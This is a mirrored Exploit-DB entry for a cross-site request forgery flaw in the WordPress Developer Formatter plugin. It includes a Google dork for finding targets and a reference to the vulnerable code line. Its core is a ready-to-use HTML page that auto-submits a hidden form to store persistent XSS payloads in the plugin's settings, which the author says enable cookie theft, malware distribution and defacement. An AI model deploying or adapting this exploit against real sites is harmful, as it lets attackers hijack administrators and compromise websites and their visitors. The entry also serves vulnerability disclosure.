bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/24294.txt
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

38 lines
No EOL
2.3 KiB
Text
Raw Blame History

====================================================================================================================
# Exploit Title: Wordpress Developer Formatter CSRF Vulnerability
# Google Dork: inurl:devformatter/devformatter.php
# Date: 21/01/13
# Author: Junaid Hussain -[ illSecure Research Group ] -
# Contact: illSecResearchGroup@Gmail.com | Website: illSecure.com
# Software Link: http://wordpress.org/extend/plugins/devformatter/
# Vendor: http://wordpress.org/extend/plugins/devformatter/
# Tested on: CentOS 5
# Version: Wordpress Version 3.5, Should work on all versions.
====================================================================================================================
[#] Vulnerable Code
Page: devinterface.php - Line: 46
<form method="post" action="options-general.php?page=devformatter/devformatter.php">
[#] no nonce given - Read: http://codex.wordpress.org/Function_Reference/wp_nonce_field
====================================================================================================================
// CSRF Exploit:
<html>
<body onload="javascript:document.forms[0].submit()">
<form method="post" action="http://[DOMAIN NAME]/wp-admin/options-general.php?page=devformatter/devformatter.php">
<input name="usedevformat" style="display:none;" type="checkbox" checked/>
<input name="copyclipboartext" type="text" style="display:none;" value="&lt;/textarea&gt;<script>alert(/xss/)</script>" />
<input name="showtools" style="display:none;" type="checkbox" checked/>
<textarea name="devfmtcss" rows="6" cols="60" style="display:none;">
body {
background-image: url('javascript:alert("XSS");') !important;
}
&lt;/textarea&gt;
</form></html>
====================================================================================================================
[#] copyclipboartext & devfmtcss are both vulnerable to persistent xss which could lead to cookie stealing,
malware distribution or even a defacememnt.
[#] Disclaimer: This exploit is for Research/Educational/Academic purposes only,
The Author of this exploit takes no responsibility for the way
you use this exploit, you are responsible for your own actions.
====================================================================================================================
Original: http://illsecure.com/code/Wordpress-DevFormatter-CSRF-Vulnerability.txt
Reference in a new issue View git blame Copy permalink